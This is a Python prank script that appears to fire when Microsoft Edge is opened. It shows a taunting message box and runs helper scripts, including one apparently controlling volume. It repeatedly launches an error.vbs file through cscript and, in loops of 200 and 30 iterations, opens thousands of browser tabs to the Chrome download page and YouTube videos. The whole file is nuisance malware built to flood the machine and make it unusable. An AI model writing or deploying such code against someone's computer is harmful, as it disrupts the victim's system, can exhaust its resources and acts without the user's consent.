import webbrowser
import tkinter.messagebox as messagebox
import time
import subprocess


webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')

messagebox.showinfo("Uh oh", "You have tried to open up Microsoft Edge! Edge is a potentially unwanted program. Try a good web browser like Google Chrome")
subprocess.Popen(["python", "volume.py"])
time.sleep(20)
subprocess.Popen(["python", "Background.py"])
time.sleep(2)
vbs_path = "error.vbs"
subprocess.Popen(['cscript.exe', vbs_path], shell=True)
subprocess.Popen(['cscript.exe', vbs_path], shell=True)
subprocess.Popen(['cscript.exe', vbs_path], shell=True)
subprocess.Popen(['cscript.exe', vbs_path], shell=True)
subprocess.Popen(['cscript.exe', vbs_path], shell=True)
subprocess.Popen(['cscript.exe', vbs_path], shell=True)
subprocess.Popen(['cscript.exe', vbs_path], shell=True)
subprocess.Popen(['cscript.exe', vbs_path], shell=True)
subprocess.Popen(['cscript.exe', vbs_path], shell=True)
subprocess.Popen(['cscript.exe', vbs_path], shell=True)
time.sleep(5)
webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
webbrowser.open('https://www.youtube.com/watch?v=dQw4w9WgXcQ')
webbrowser.open('https://www.youtube.com/watch?v=dQw4w9WgXcQ')
webbrowser.open('https://www.youtube.com/watch?v=dQw4w9WgXcQ')
webbrowser.open('https://www.youtube.com/watch?v=dQw4w9WgXcQ')
webbrowser.open('https://www.youtube.com/watch?v=wZWB7tDYt0M')
time.sleep(5)
webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
for _ in range(200):
    subprocess.Popen(["python", "volume.py"])
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.youtube.com/watch?v=wZWB7tDYt0M')
    webbrowser.open('https://www.youtube.com/watch?v=wZWB7tDYt0M')
    subprocess.Popen(['cscript.exe', vbs_path], shell=True)
    webbrowser.open('https://www.youtube.com/watch?v=wZWB7tDYt0M')
    webbrowser.open('https://www.youtube.com/watch?v=wZWB7tDYt0M')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.youtube.com/watch?v=dQw4w9WgXcQ')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    subprocess.Popen(['cscript.exe', vbs_path], shell=True)
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')
    webbrowser.open('https://www.google.com.au/intl/en_au/chrome/')

for _ in range(30):
    subprocess.Popen(['cscript.exe', vbs_path], shell=True)